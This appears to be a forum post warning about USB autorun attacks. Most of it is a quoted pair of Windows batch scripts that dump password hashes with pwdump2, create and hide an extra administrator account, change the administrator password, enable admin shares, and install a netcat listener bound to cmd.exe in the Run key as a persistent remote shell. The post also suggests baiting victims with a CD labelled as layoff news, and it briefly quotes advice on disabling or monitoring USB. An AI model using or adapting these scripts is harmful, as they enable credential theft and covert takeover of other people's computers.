Quote:
*********<BOF test.bat>
@echo off
@start /min b.bat /B
@exit
<EOF test.bat>
*********<BOF b.bat>
@explorer .
@echo off
::Displaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt
::Adding a user for me :o)
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators _system32_ /add
::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t
REG_DWORD /d 0 /f
::Enabling Admin Shares
@reg add
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v
@AutoSharewks /t reg_dword /d 1 /f
::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu
::Backdooring
@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
"Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f
@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>
Another person pointed out another crule idea. Leaving a CD on the ground with something like "Forth Quarter Layoffs" written on it. I assure you more than one person would instantly insert that in their computer and an autorun sequence could have their computer for lunch.
Quote:
Disabling USB all-together, virtually, by domain policy or removing the
USB devices themselves, maybe even just filling the plugs with silicon
or glue physically are some more drastic options which some
organizations *might* take, but I don't see it as a very viable option
for most.
It all depends on your risk analysis. Cost vs. benefit, as always with
security.
There exist several tools to monitor a domain for when and if a USB
device is connected to any remote machine, and of what kind. A simple
web search should help you find some examples.
Basically, just a heads up that this can and does happen very easily so watch out!